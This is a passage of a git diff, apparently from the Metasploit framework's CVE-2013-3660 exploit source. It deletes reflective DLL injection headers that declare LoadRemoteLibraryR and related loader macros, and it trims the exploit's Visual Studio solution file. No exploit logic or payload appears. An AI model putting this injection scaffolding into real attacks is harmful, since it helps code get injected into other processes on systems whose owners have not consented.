-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-#define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
-
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 27db65dc1b..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#include
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH 4
-#define DLL_METASPLOIT_DETACH 5
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
index ee7fc4ace6..0a0dde7c06 100755
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ b/external/source/exploits/cve-2013-3660/rdi.sln
@@ -1,44 +1,18 @@
Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Express 2012 for Windows Desktop
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
+# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|ARM = Debug|ARM
Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
- Release|ARM = Release|ARM
Release|Win32 = Release|Win32
- Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE